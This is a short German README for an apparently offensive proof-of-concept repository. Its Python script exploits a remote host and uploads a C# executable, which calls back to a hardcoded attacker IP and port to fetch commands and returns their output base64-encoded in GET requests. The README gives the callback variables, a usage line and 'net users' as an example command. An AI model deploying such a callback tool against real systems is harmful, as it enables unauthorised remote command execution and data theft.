
Dieses Repository wurde erstellt, um den Nessus-POC mit einer benutzerdefinierten C#-Executable zu nutzen, um Befehle auf einem entfernten Host auszuführen und die Ausgabe des Befehls zu erhalten.
Die Python-Datei wird verwendet, um einen Webserver zu starten, den Exploit auszuführen und anschließend die Ergebnisse über den Webserver abzurufen.
Die C#-EXE wird über den Exploit auf das Ziel hochgeladen.
Wenn sie auf dem Ziel ausgeführt wird, ruft die EXE die angegebene IP bzw. den angegebenen Port zurück, um den auszuführenden Befehl zu erhalten (Pfad ist /cmd).
Sobald der Befehl abgeschlossen ist, sendet die EXE die Ausgabe an denselben Webserver.
Das Senden der Ausgabe erfolgt über eine GET-Anfrage, die einen 404 erzeugt, aber das ist in Ordnung, wir wollen nur die Base64-Daten.
Die C#-EXE hat zwei Variablen, die aktualisiert werden müssen
Diese Variablen verweisen auf die IP und den Port des angreifenden Systems
string ip = "10.8.0.3";
string port = "8000";
python dameware-poc.py -t target_ip -e executable_to_upload
Das folgende Beispiel führt den Befehl net users auf dem entfernten Host aus
